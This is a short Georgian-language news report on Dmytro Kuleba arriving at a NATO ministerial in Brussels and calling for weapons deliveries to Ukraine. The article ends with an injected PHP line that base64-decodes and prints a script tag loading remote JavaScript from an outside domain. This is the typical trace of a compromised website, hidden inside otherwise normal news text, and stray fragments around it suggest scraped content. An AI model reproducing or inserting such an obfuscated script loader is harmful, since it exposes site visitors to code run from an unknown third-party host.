celsiusi
ავერსი შნაიდერი
ბრიუსელში ნატო-ს საგარეო საქმეთა მინისტერიალი იწყება. ალიანსის შტაბ-ბინაში უკვე მივიდა უკრაინის საგარეო საქმეთა მინისტრი, დმიტრო კულება. 
 
როგორც მან აღნიშნა, ახლა უკრაინისთვის ყველაზე მთავარი იარაღის მიწოდებაა, რათა პუტინი დამარცხდეს და ომს ნაკლები ადამიანის სიცოცხლეს შეეწიროს.
 
"ბრიუსელში ნატოს მინისტერიალში მონაწილეობის მისაღებად და მოკავშირეებთან ორმხრივი შეხვედრების გასამართად ჩამოვედი. ჩემი დღის წესრიგი მარტივია, იქ მხოლოდ სამი პუნქტია, ეს არის - იარაღი, იარაღი და იარაღი. დარწმუნებული ვართ, რომ უკრაინის დახმარების საუკეთესო გზა ახლა ყველა იმ აუცილებლობით უზრუნველყოფაა, რაც საჭიროა პუტინის შესაჩერებლად და რუსეთის არმიის დასამარცხებლად. ბოლო კვირებში უკრაინის არმიამ აჩვენა, რომ ჩვენ ვიცით, როგორ ვიბრძოლოთ, როგორ გავიმარჯვოთ, თუმცა იარაღის გარეშე. ამ გამარჯვებას თან უზარმაზარი მსხვერპლი სდევს. რაც უფრო მეტ იარაღს მივიღებთ, რაც უფრო სწრაფად ჩამოვა ის უკრაინაში, მით მეტი სიცოცხლე გადარჩება. ქალაქები და დასახლებები არ განადგურდება", - თქვა დმიტრო კულებამ. 
696
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");